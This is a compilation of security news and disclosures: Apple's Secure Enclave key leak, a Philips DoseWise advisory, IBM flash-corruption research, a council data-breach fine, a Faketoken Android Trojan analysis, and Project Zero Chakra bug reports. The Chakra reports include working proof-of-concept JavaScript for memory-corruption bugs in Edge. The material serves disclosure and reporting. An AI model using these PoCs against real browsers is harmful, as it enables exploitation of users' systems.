It’s Not Exactly Open Season on the iOS Secure Enclave

The black box that is Apple’s iOS Secure Enclave may have been pried open, but that doesn’t necessarily mean it’s open season on iPhones and iPads worldwide.

Yesterday’s public disclosure of the decryption key for the Secure Enclave Processor firmware does indeed allow white and black hats alike to poke and probe for vulnerabilities. But finding a bug is one thing; exploiting it may be quite another.

Very little granular detail has been made public about what’s going on inside Secure Enclave. Probably the best-known insight came from a 2016 Black Hat talk given by Azimuth Security researchers Tarjei Mandt, David Wang and Mathew Solnik.

They were able to reverse engineer the Secure Enclave Processor (SEP) hardware and software, and determined that while the hardware was state-of-the-art—or better—the software left a bit to be desired. Wang was interviewed on the Risky Business podcast (interview begins at 31:24) nearly a year ago and told host Patrick Gray that there was very little in the way of memory mitigations, though he could see that Apple was constantly tinkering with the security of the Secure Enclave’s software with each successive update.

“We think the hardware is light years ahead of the competition; the software, not so much,” Wang said. “It’s missing a lot of modern exploit mitigation technology; it’s pretty much unprotected.”

This also came up during the Black Hat presentation, where it was revealed that protections such as ASLR and stack cookies were missing at the time.

Mandt, however, yesterday echoed what other researchers have been saying since the key was published: the immediate threat to users is negligible.

“Our research from last year also showed that doing this typically requires additional vulnerabilities in iOS in order to enable an attacker to communicate arbitrary messages (data) to the SEP,” Mandt told Threatpost. “It is also worth noting that Apple by now presumably has addressed the shortcomings that we highlighted last year regarding exploit mitigations, making exploitation harder.”

According to the most recent iOS Security Guide, communication between the Secure Enclave and the iOS application processor—which is entirely separated from the SEP—is done through “an interrupt-driven mailbox and shared memory data buffers.”
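Apple publishes no implementation detail beyond that sentence, but the general shape of such a channel can be sketched. The Python toy below (all names hypothetical, not Apple’s) models the shared memory buffer as a plain variable and the interrupt as an event that wakes the receiving side:

```python
import threading

class Mailbox:
    """Toy interrupt-driven mailbox: a shared buffer plus a 'doorbell'."""

    def __init__(self):
        self.shared_buffer = None          # stands in for shared memory
        self.doorbell = threading.Event()  # stands in for the interrupt

    def send(self, message):
        self.shared_buffer = message
        self.doorbell.set()                # raise the "interrupt"

    def receive(self):
        self.doorbell.wait()               # sleep until interrupted
        self.doorbell.clear()
        return self.shared_buffer

ap_to_sep = Mailbox()
sep_to_ap = Mailbox()

def sep_loop():
    # the "SEP" wakes on the doorbell, processes the request, and replies
    msg = ap_to_sep.receive()
    sep_to_ap.send(("ok", msg))

sep = threading.Thread(target=sep_loop)
sep.start()
ap_to_sep.send("verify_fingerprint")       # the "application processor" side
reply = sep_to_ap.receive()                # reply == ("ok", "verify_fingerprint")
sep.join()
```

This is only a sketch of the message-passing shape; the real channel involves hardware interrupts and a strict message protocol, which is exactly why Mandt notes that an attacker still needs a way to get arbitrary messages to the SEP.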

As for the lack of ASLR or stack cookies, Wang told Risky Business this could be due to a lack of computing resources in the Secure Enclave microkernel needed to support these mitigations.

The Secure Enclave, as explained in the iOS Security Guide, is a coprocessor unto itself inside the mobile operating system. Its job is to handle cryptographic operations for data protection key management; its separation from the rest of iOS maintains its integrity even if the kernel is compromised, Apple said in the guide. Primarily, the Secure Enclave processes Touch ID fingerprint data, signs off on purchases authorized through the sensor, and unlocks the phone by verifying the user’s fingerprint.

The key was published by a hacker known only as xerub, who refused to identify himself or provide any detail on how he derived the key or whether he found any vulnerabilities in the Secure Enclave. Apple acknowledged the report, but as of yesterday still had not confirmed the legitimacy of the key xerub published. The key unlocks only the SEP firmware; user data is not at risk, xerub told Threatpost.

The disclosure also harkened back to Apple’s decision last June to release an unencrypted version of the iOS 10 kernel to beta testers. “The kernel cache doesn’t contain any user info, and by unencrypting it we’re able to optimize the operating system’s performance without compromising security,” Apple said at the time.

The decision sparked concerns similar to those raised by yesterday’s leak: that attackers as well as legitimate researchers would be able to find and potentially exploit vulnerabilities in the kernel. Apple’s contention is that the move ultimately improves security, with more researchers examining the code for bugs and privately disclosing them to the company or through its bug bounty program. Such a move also potentially weakens gray-market sales of iOS bugs, and government hoarding of them.

Yesterday’s news set off another flurry of angst as to the ongoing security of iOS and what would happen now that the firmware had been unlocked.

“I wouldn’t say there is any immediate threat to users at this point,” Azimuth Security’s Mandt said. “Although the key disclosure allows anyone to analyze the software that is running on the SEP processor, it still requires an attacker to find and exploit a vulnerability in order to compromise SEP.”

Hacker Publishes iOS Secure Enclave Firmware Decryption Key

A hacker Thursday afternoon published what he says is the decryption key for Apple iOS’ Secure Enclave Processor (SEP) firmware.

The hacker, identified only as xerub, told Threatpost that the key unlocks only the SEP firmware, and that this would not impact user data.

“Everybody can look and poke at SEP now,” xerub said.

Apple did confirm to Threatpost that, if the key is legitimate, user data would not be at risk from this leak. The company, however, has yet to confirm the validity of the key.

The Secure Enclave, as explained in the iOS Security Guide, is a coprocessor unto itself inside the mobile operating system. Its job is to handle cryptographic operations for data protection key management; its separation from the rest of iOS maintains its integrity even if the kernel is compromised, Apple said in the guide.

Primarily, the Secure Enclave processes Touch ID fingerprint data, signs off on purchases authorized through the sensor, or unlocks the phone by verifying the user’s fingerprint.

Publication of the key now exposes the Secure Enclave firmware to researchers and attackers alike, both of whom will be able to examine the previously walled-off processor for vulnerabilities and gain insight into how it operates.

“Hopefully Apple will work harder now that they can’t hide SEP, resulting in improved security for users,” xerub said.

Xerub would not provide any details on how he decrypted the key, nor would he comment on whether he looked for, or found any, vulnerabilities in the Secure Enclave once he had access. He also would not comment on whether he privately disclosed his finding to Apple in advance.

“This isn’t really bad in my opinion,” said Patrick Wardle, chief security researcher at Synack and founder of Objective-See. “[This] just means the security researchers, and yes hackers, can now look at the firmware for bugs. Before, it was encrypted so they couldn’t audit and analyze it. Is a system less secure if people can audit it? Yes. Hackers can and will also look for bugs now too.”

The questions left open are whether xerub leveraged a vulnerability or weakness in Secure Enclave to obtain the key, and whether Apple will be able to deploy a new encryption key for the Secure Enclave firmware, should it choose to do so.

Until today, there had been very little public information about Secure Enclave. Apple is notoriously tight-lipped about security and infrequently talks about the mechanisms keeping iOS or any of its platforms safe.

A 2016 Black Hat presentation on Secure Enclave by Azimuth Security’s Tarjei Mandt, Mathew Solnik and David Wang was one of the deepest dives behind this mysterious curtain. The researchers went into some high-level detail about its design and security resilience, but little is known about its implementation.

As for Touch ID, it has been available since the release of the iPhone 5s and, on the tablet side, the iPad Air 2. In addition to unlocking the phone with a fingerprint, users can likewise approve transactions through Apple Pay, the Apple App Store, iBooks and other online stores. The Secure Enclave watches over it, processing fingerprint data and determining whether there is a match against fingerprints the user has already registered on the device, the iOS Security Guide says.

“Communication between the processor and the Touch ID sensor takes place over a serial peripheral interface bus,” the iOS Security Guide says. “The processor forwards the data to the Secure Enclave but can’t read it. It’s encrypted and authenticated with a session key that is negotiated using the device’s shared key that is provisioned for the Touch ID sensor and the Secure Enclave. The session key exchange uses AES key wrapping with both sides providing a random key that establishes the session key and uses AES-CCM transport encryption.”
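Apple does not publish the actual key schedule, and Python’s standard library has no AES, so the sketch below substitutes a hash-based combiner purely to show the shape of the exchange: each side contributes fresh randomness, and the resulting session key depends on both contributions. This is not Apple’s real construction, which uses AES key wrapping under the provisioned shared key and AES-CCM for transport.

```python
import hashlib
import secrets

def contribute():
    # each endpoint (sensor / Secure Enclave) supplies fresh randomness
    return secrets.token_bytes(16)

def derive_session_key(sensor_rand, sep_rand):
    # both contributions feed the key, so neither side alone controls it;
    # the real exchange wraps these under the device's provisioned key
    return hashlib.sha256(sensor_rand + sep_rand).digest()[:16]

sensor_rand = contribute()
sep_rand = contribute()

# after exchanging contributions, both ends derive the same session key
k_sensor = derive_session_key(sensor_rand, sep_rand)
k_sep = derive_session_key(sensor_rand, sep_rand)
assert k_sensor == k_sep and len(k_sensor) == 16
```

The design point the guide is making survives the simplification: because both sides inject randomness, an attacker who records one session cannot replay its key against the next.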

Philips' DoseWise Portal Vulnerabilities

OVERVIEW

Philips has identified Hard-coded Credentials and Cleartext Storage of Sensitive Information vulnerabilities in Philips’ DoseWise Portal (DWP) web application. Philips has updated product documentation and produced a new version that mitigates these vulnerabilities.

These vulnerabilities could be exploited remotely.

AFFECTED PRODUCTS

The following Philips DWP versions are affected:

  • DoseWise Portal, Versions 1.1.7.333 and 2.1.1.3069

IMPACT

Successful exploitation may allow a remote attacker to gain access to the database of the DWP application, which contains patient health information (PHI). Potential impact could therefore include compromise of patient confidentiality, system integrity, and/or system availability.

Impact to individual organizations depends on many factors that are unique to each organization. NCCIC/ICS-CERT recommends that organizations evaluate the impact of these vulnerabilities based on their operational environment and specific clinical usage.

BACKGROUND

Philips is a global company that maintains offices in several countries around the world, including countries in Africa, Asia, Europe, Latin America, the Middle East, and North America.

The affected product, DWP, is a web-based reporting and tracking tool for radiation exposure. DWP is standalone Class A software in accordance with IEC 62304. According to Philips, the DWP application is deployed across the Healthcare and Public Health sector. Philips indicates that these products are used primarily in Australia, the United States, Japan, and Europe.

VULNERABILITY CHARACTERIZATION

VULNERABILITY OVERVIEW

USE OF HARD-CODED CREDENTIALS

The backend database of the DWP application uses hard-coded credentials for a database account with privileges that can affect the confidentiality, integrity, and availability of the database. To exploit this vulnerability, an attacker first needs elevated privileges to access the web application’s backend system files that contain the hard-coded credentials. Successful exploitation may allow a remote attacker to gain access to the database of the DWP application, which contains PHI.

CVE-2017-9656 has been assigned to this vulnerability. A CVSS v3 base score of 9.1 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H).

CLEARTEXT STORAGE OF SENSITIVE INFORMATION

The web-based application stores login credentials in clear text within backend system files.

CVE-2017-9654 has been assigned to this vulnerability. A CVSS v3 base score of 6.5 has been assigned; the CVSS vector string is (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).
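Both weaknesses come down to secrets living in readable files. A minimal Python sketch (all names hypothetical, not taken from the DWP product) contrasts the flawed pattern with the common fix of injecting credentials at deploy time:

```python
import os

# Anti-pattern (CWE-798): credentials baked into the shipped application.
# Anyone who can read the backend files recovers the database password,
# which is also, by definition, stored in cleartext.
DB_USER = "dwp_admin"        # hypothetical account name
DB_PASSWORD = "S3cret!"      # hard-coded, cleartext

def credentials_hardcoded():
    return DB_USER, DB_PASSWORD

# Safer pattern: credentials injected from the environment (or a secrets
# store) at deploy time, so they never sit in code or config files and
# can be rotated without shipping a new build.
def credentials_from_env():
    return os.environ["DWP_DB_USER"], os.environ["DWP_DB_PASSWORD"]
```

This is why Philips’ fix for 2.1.1.3069 replaces the authentication method outright rather than merely changing the password: a rotated hard-coded secret would still be a hard-coded secret.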

VULNERABILITY DETAILS

EXPLOITABILITY

These vulnerabilities could be exploited remotely.

EXISTENCE OF EXPLOIT

No known public exploits specifically target these vulnerabilities.

DIFFICULTY

An attacker with a low skill level would be able to exploit these vulnerabilities.

MITIGATION

Philips is scheduled to release a new product version and supporting product documentation in August 2017. For all users of DWP Version 2.1.1.3069, Philips will update the DWP installation to Version 2.1.2.3118. This update will replace the authentication method and eliminate hard-coded/fixed password vulnerabilities from the DWP system.

All users of DWP Version 1.1.7.333 will be supported by Philips to reconfigure the DWP installation to change and fully encrypt all stored passwords.

Philips has notified users of the identified vulnerabilities and will coordinate with users to schedule updates. Philips encourages users to use Philips-validated and authorized changes only for the DWP system supported by Philips’ authorized personnel or under Philips’ explicit published directions for product patches, updates, or releases.

As an interim mitigation, until the update can be applied, Philips recommends that users:

  • Ensure that network security best practices are implemented, and
  • Block Port 1433, except where a separate SQL server is used.

Philips’ advisory is available at the following URL:

http://www.philips.com/productsecurity

DWP users with questions should contact their local Philips service support team or their regional service support. Contact information is available at the following location:

http://www.usa.philips.com/healthcare/solutions/customer-service-solutions

ICS-CERT recommends that users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:

  • Minimize network exposure for all medical devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate all medical devices and remote devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

ICS-CERT also provides a section for security recommended practices on the ICS-CERT web page at http://ics-cert.us-cert.gov/content/recommended-practices. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

Additional mitigation guidance and recommended practices are publicly available in the ICS‑CERT Technical Information Paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).

Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.

IBM researchers: Rowhammer-like attack on flash memory can provide root privileges to attacker

The way NAND flash memory used in solid state drives (SSDs) works makes it possible for an attacker with write access to gain root privileges on a system, researchers from IBM demonstrated during the WOOT ’17 conference currently being held in Vancouver. The method they demonstrated works similarly to the ‘Rowhammer’ DRAM attack.

Rowhammer is a vulnerability in DRAM that allows an attacker to manipulate memory without accessing it. By repeatedly accessing a specific memory location, a bit elsewhere in memory can unintentionally ‘flip’, meaning that a ‘1’ can turn into a ‘0’ or vice versa. By flipping bits it is eventually possible to gain read and write access to all physical memory, after which it is possible to obtain kernel privileges.
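Mechanically, a flip is just an XOR with a single-bit mask. The Python sketch below (illustrative values, not an attack) shows why one disturbed bit is enough to matter, for example in a page-table-style entry where individual bits encode permissions or the physical frame number:

```python
def flip_bit(value, bit):
    # a disturbance-induced bit flip is equivalent to XOR with a one-bit mask
    return value ^ (1 << bit)

# hypothetical 64-bit page-table-style entry: frame number plus flag bits
entry = 0x0000000080000067

flag_flipped = flip_bit(entry, 1)    # e.g. a permission-style flag toggles
frame_flipped = flip_bit(entry, 20)  # the entry now refers to another frame

assert flag_flipped != entry and frame_flipped != entry
# flipping the same bit a second time restores the original value
assert flip_bit(flag_flipped, 1) == entry
```

Which bit flips, and what data structure it lands in, is exactly what turns a physical disturbance into a logical privilege escalation.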

The Rowhammer attack was already demonstrated in 2015 and researchers from IBM were curious to find out whether a similar attack was also possible against SSD drives with MLC NAND flash memory.

“DRAM is not the only place that holds sensitive data that is essential to the correct working of security primitives implemented in software,” the researchers write in their report. Sensitive data can also be reached through the filesystem used by the operating system. In their tests the researchers used the ext3 filesystem on Linux.

Other software could be a target as well, according to the researchers: “any program (in the broad sense) that accesses the SSD, directly or indirectly, is potentially a target for non-physical integrity attacks on SSDs.”

In their scenario, the researchers assume that the victim runs a filesystem on an SSD that consists of MLC NAND flash memory. They also assume that the attacker has ‘unprivileged’ rights (i.e., non-root) on the system, and that corruption of the underlying flash media is possible. The attacker doesn’t need physical access to the system; it could also be a server with shell access.

Just as with the Rowhammer attack on DRAM, the NAND flash chips of SSDs can be manipulated in a way that allows an attacker to elevate his privileges on the system. To protect against the attack, an SSD can be encrypted. In the future the researchers hope to demonstrate a full system attack.

Several manufacturers, such as Google and Apple, released updates for their devices in response to the Rowhammer attack. It’s unclear whether the IBM researchers informed hardware manufacturers about their attack on SSDs.

Full report here (.PDF) | via Security.nl

Update: Our reporting was incorrect; here is a comment from the author of the report: “Author here, I would like to set the record straight. We do not claim to have an attack on SSDs. The journalist seems to have misunderstood and not read the paper. The attack demonstrated is not on an FPGA or SSD. The main point this paper makes and demonstrates is that if you can cause corruption of a full block (i.e., completely garble the contents of a chosen block), then you can elevate privileges (with some assumptions, like using ext3). Note that this result does not depend on whether you are using an SSD, a disk, or any other storage for your filesystem.”

London council ‘failed to test’ parking ticket app, exposed personal info

Authority fined £70k after missing URL manipulation

A London council has been fined £70,000 after design faults in its TicketViewer app allowed unauthorised access to 119 documents containing sensitive personal information.

The parking ticket application, set up in 2012, was developed by Islington council’s internal application team for the authority’s parking services.

It allowed people issued with a parking ticket in the north London borough to log on using their car registration number and see CCTV images or videos of their alleged offence.

They could then appeal this ticket by sending supporting evidence – which might include details of health issues, disabilities or finances – to the council by email or post. The back office would scan and upload this information into the system as a ticket attachment folder.

That brought together a person’s car reg, name, address and potentially medical and financial details – so you’d hope the council had properly tested the system.

But it seems this was not to be, and in October 2015 a concerned citizen alerted the council to the fact that these ticket attachment folders could be accessed if a user tweaked the URL.
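From the description, this is the classic insecure-direct-object-reference pattern: the handler serves whatever folder identifier appears in the URL without checking that it belongs to the logged-in user. A minimal Python sketch (hypothetical names, not Islington’s actual code) of the flaw and the obvious fix:

```python
# toy data store keyed by attachment-folder id, owned by a car registration
ATTACHMENTS = {
    "folder-1001": {"owner": "AB12CDE", "files": ["medical.pdf"]},
    "folder-1002": {"owner": "XY34ZZZ", "files": ["finances.pdf"]},
}

def fetch_vulnerable(folder_id):
    # serves whatever id the URL carries: tweak the URL, get the folder
    return ATTACHMENTS[folder_id]["files"]

def fetch_fixed(folder_id, logged_in_reg):
    # authorisation check: the folder must belong to the logged-in user
    folder = ATTACHMENTS.get(folder_id)
    if folder is None or folder["owner"] != logged_in_reg:
        raise PermissionError("folder does not belong to this user")
    return folder["files"]
```

The ICO’s finding that the web server’s folder browsing was also misconfigured compounds the same mistake: nothing between the URL and the data ever asked who was requesting it.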

Between the launch of the site in 2012 and the date the issue was reported, 825,000 parking tickets had been issued and 270,000 appeals received.

On October 25, 2015, the ticket attachment folders contained personal data relating to 89,000 users while internal testing showed that 119 documents had been accessed a total of 235 times from 36 unique IP addresses.

That information was related to 71 users – although an investigation by the UK’s data protection watchdog found that there was no evidence that anyone had actually been harmed by the breach.

However, the Information Commissioner’s Office found that the council had failed to take proper technical measures to stop unauthorised access to the information, and handed it a £70,000 fine (PDF) for breaching the Data Protection Act.

The ICO said that the folder browsing functionality in the web server was misconfigured and that the application had design faults.

“The council should have tested the system both prior to going live and regularly after that,” it said.

“For no good reason, Islington appears to have overlooked the need to ensure that it had robust measures in place despite having the financial and staffing resources available.”

The council notified both the ICO and the people whose data was exposed and, in a statement sent to The Register today, once again apologised for the breach.

“We remain very sorry about the previous TicketViewer problem and agree with the ICO that we failed to meet the required data protection standards back in 2015,” a spokesperson said.

“As soon as we were aware of the problem we took every possible action to prevent a recurrence and instructed auditors to carry out a thorough review so we could learn from our mistake.”

The council added that it had taken advantage of the reduced fine offered by the ICO for early payment, which cut the costs to £56,000. 

Booking a Taxi for Faketoken

The Trojan-Banker.AndroidOS.Faketoken malware has been known for more than a year already. Over its lifetime it has worked its way up from a primitive Trojan that intercepted mTAN codes to a full-blown encrypter. The authors of its newer modifications continue to upgrade the malware, and its geographical spread is growing. Some of these modifications contain overlay mechanisms for about 2,000 financial apps. In one of the newest versions, we also detected a mechanism for attacking apps for booking taxis and for paying traffic tickets issued by the Main Directorate for Road Traffic Safety.

Not so long ago, thanks to our colleagues from a large Russian bank, we detected a new Trojan sample, Faketoken.q, which contained a number of curious features.

Infection

We have not yet managed to reconstruct the entire chain of events leading to infection, but the application icon suggests that the malware sneaks onto smartphones through bulk SMS messages with a prompt to download some pictures.

The malware icon

The structure of the malware

The mobile Trojan that we examined consists of two parts. The first part is an obfuscated dropper (verdict: Trojan-Banker.AndroidOS.Fyec.az): files like this are usually obfuscated on the server side in order to resist detection. At first glance, it may seem that its code is gibberish:

However, this code works quite well. It decrypts and launches the second part of the malware. This is standard practice these days, whereas unpacked Trojans are very rare.

The second part of the malware, which is a file with a DAT extension, contains the malware’s main features. Its data is encrypted:

By decrypting the data, it is possible to obtain a rather legible code:
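The write-up does not spell out the cipher, so the following Python sketch uses a simple XOR stream purely as a stand-in to show the general two-stage pattern described above: the dropper ships the second stage as an opaque blob and reverses the transform in memory before handing the result to a loader.

```python
def xor_crypt(blob, key):
    # symmetric: the same transform both encrypts and decrypts
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(blob))

key = b"k3y!"                                  # hypothetical key material
second_stage = b"main payload: overlays, call recording, SMS theft"

shipped_dat = xor_crypt(second_stage, key)     # the opaque blob on disk
assert shipped_dat != second_stage             # unreadable to a quick scan

recovered = xor_crypt(shipped_dat, key)        # what the dropper launches
assert recovered == second_stage
```

The point of the split is exactly what the analysts describe: static scanners see only the obfuscated dropper and an encrypted DAT file, while the legible code exists only after decryption.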

After the Trojan initiates, it hides its shortcut icon and starts to monitor all calls and every app the user launches. Upon receiving a call from (or making a call to) a certain phone number, the malware begins to record the conversation and sends the recording to the evildoers shortly after the conversation ends.

The code for recording a conversation

The authors of Faketoken.q kept the overlay features and simplified them considerably. So, the Trojan is capable of overlaying several banking and miscellaneous applications, such as Android Pay, Google Play Store, and apps for paying traffic tickets and booking flights, hotel rooms, and taxis.

Faketoken.q monitors active apps and, as soon as the user launches a specific one, it substitutes its UI with a fake one, prompting the victim to enter his or her bank card data. The substitution happens instantaneously, and the colors of the fake UI correspond to those of the original launched app.
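The monitoring loop reduces to a small sketch. This Python toy (package names invented, not from the Faketoken sample) mimics the logic: watch the foreground app and, when a targeted one appears, present a card-entry form styled after it.

```python
# invented package names standing in for the ~2,000 targeted apps
TARGETED_APPS = {"com.example.taxi", "com.example.bank"}

def overlay_for(foreground_app):
    """Return a fake card-entry form when a targeted app is in front."""
    if foreground_app in TARGETED_APPS:
        # the real Trojan matches the colors of the victim app so the
        # substitution is not obvious to the user
        return "card-entry form styled like " + foreground_app
    return None

assert overlay_for("com.example.taxi") is not None
assert overlay_for("com.example.maps") is None   # untargeted apps untouched
```

The instantaneous substitution the analysts describe is what makes the attack effective: the user believes the prompt belongs to the app they just opened.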

It should be noted that all of the apps attacked by this malware sample support linking bank cards in order to make payments. Indeed, the terms of some apps make linking a bank card mandatory in order to use the service. As millions of Android users have these applications installed, the damage caused by Faketoken could be significant.

However, the following question may arise: what do fraudsters do in order to process a payment if they have to enter an SMS code sent by the bank? Evildoers successfully accomplish this by stealing incoming SMS messages and forwarding them to command-and-control servers.

We are inclined to believe that the version that we got our hands on is still unfinished, as screen overlays contain formatting artifacts, which make it easy for a victim to identify it as fake:

The screen overlays for the UI of a taxi-booking app

As screen overlays are a documented feature widely used in a large number of apps (window managers, messengers, etc.), protecting yourself against such fake overlays is quite complicated, a fact that is exploited by evildoers.

To this day we still have not registered a large number of attacks with the Faketoken sample, and we are inclined to believe that this is one of its test versions. Judging by the list of attacked applications, the Russian UI of the overlays, and the Russian language in the code, Faketoken.q is focused on attacking users from Russia and CIS countries.

Precautions

In order to avoid falling victim to Faketoken and apps similar to it, we strongly discourage the installation of third-party software on your Android device. A mobile security solution like Kaspersky Mobile Antivirus: Web Security & AppLock would be quite helpful too.

MD5

CF401E5D21DE36FF583B416FA06231D5

Microsoft Edge Chakra Incorrect Jit Optimization

Microsoft Edge: Chakra: incorrect jit optimization with TypedArray setter #3

CVE-2017-8601

Coincidentally, Microsoft released the patch for issue 1290 (“Microsoft Edge: Chakra: incorrect jit optimization with TypedArray setter #2”) the day after I reported it. But it seems they fixed it incorrectly again.

This time, "func(a, b, i);" is replaced with "func(a, b, {});".

PoC:
'use strict';

function func(a, b, c) {
    a[0] = 1.2;
    b[0] = c;
    a[1] = 2.2;
    a[0] = 2.3023e-320;
}

function main() {
    let a = [1.1, 2.2];
    let b = new Uint32Array(100);

    for (let i = 0; i < 0x1000; i++)
        func(a, b, {}); // <<---------- REPLACED

    func(a, b, {valueOf: () => {
        a[0] = {};

        return 0;
    }});

    a[0].toString();
}

main();

Tested on Microsoft Edge 40.15063.0.0(Insider Preview).

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

Found by: lokihardt

Microsoft Edge Chakra EmitNew Integer Overflow

Microsoft Edge: Chakra: Integer overflow in EmitNew

CVE-2017-8636

The bytecode generator uses the "EmitNew" function to handle new operators.
Here's how the function checks for integer overflow:
void EmitNew(ParseNode* pnode, ByteCodeGenerator* byteCodeGenerator, FuncInfo* funcInfo)
{
    Js::ArgSlot argCount = pnode->sxCall.argCount;
    argCount++; // include "this"

    BOOL fSideEffectArgs = FALSE;
    unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs);
    Assert(argCount == tmpCount);

    if (argCount != (Js::ArgSlot)argCount)
    {
        Js::Throw::OutOfMemory();
    }

}

"Js::ArgSlot" is a 16-bit unsigned integer type, and "argCount" is of the type "Js::ArgSlot". So "if (argCount != (Js::ArgSlot)argCount)" is pointless; it can't prevent the integer overflow at all.
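To see why the branch is dead, model Js::ArgSlot as a 16-bit value. The Python sketch below contrasts the shipped check with the comparison that would actually catch truncation (the "fixed" variant is my illustration of the intent, not Microsoft's patch):

```python
ARG_SLOT_MASK = 0xFFFF  # Js::ArgSlot is a 16-bit unsigned integer

def shipped_check(arg_count):
    # argCount is already a Js::ArgSlot, so casting it back to Js::ArgSlot
    # changes nothing: this condition can never be true
    arg_slot = arg_count & ARG_SLOT_MASK
    return arg_slot != (arg_slot & ARG_SLOT_MASK)

def truncation_check(untruncated_count):
    # comparing the full-width count against its 16-bit truncation is
    # what would actually detect the overflow
    return untruncated_count != (untruncated_count & ARG_SLOT_MASK)

real_count = 0x10000 + 1                     # 0x10000 arguments plus "this"
assert shipped_check(real_count) is False    # overflow goes unnoticed
assert truncation_check(real_count) is True  # would have caught it
```

That silent wrap-around is exactly what the PoC below provokes with an Array of 0x10000 arguments.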

PoC:
let args = new Array(0x10000);
args = args.fill(0x1234).join(', ');
eval('new Array(' + args + ')');

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

Found by: lokihardt

Microsoft Edge Chakra Parser::ParseFncFormals Uninitialized Arguments

Microsoft Edge: Chakra: Uninitialized arguments 2

CVE-2017-8670

Similar to issue #1297 (“Microsoft Edge: Chakra: Uninitialized arguments”), but this time it happens in "Parser::ParseFncFormals" with the "PNodeFlags::fpnArguments_overriddenInParam" flag.

template<bool buildAST>
void Parser::ParseFncFormals(ParseNodePtr pnodeFnc, ParseNodePtr pnodeParentFnc, ushort flags)
{

    if (IsES6DestructuringEnabled() && IsPossiblePatternStart())
    {

        // Instead of passing the STFormal all the way on many methods, it seems it is better to change the symbol type afterward.
        for (ParseNodePtr lexNode = *ppNodeLex; lexNode != nullptr; lexNode = lexNode->sxVar.pnodeNext)
        {
            Assert(lexNode->IsVarLetOrConst());
            UpdateOrCheckForDuplicateInFormals(lexNode->sxVar.pid, &formals);
            lexNode->sxVar.sym->SetSymbolType(STFormal);
            if (m_currentNodeFunc != nullptr && lexNode->sxVar.pid == wellKnownPropertyPids.arguments)
            {
                m_currentNodeFunc->grfpn |= PNodeFlags::fpnArguments_overriddenInParam; // <<------ HERE
            }
        }

    }
}

PoC:
function f() {
    ({a = ([arguments]) => {
    }} = 1);

    arguments.x;
}

f();

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

Found by: lokihardt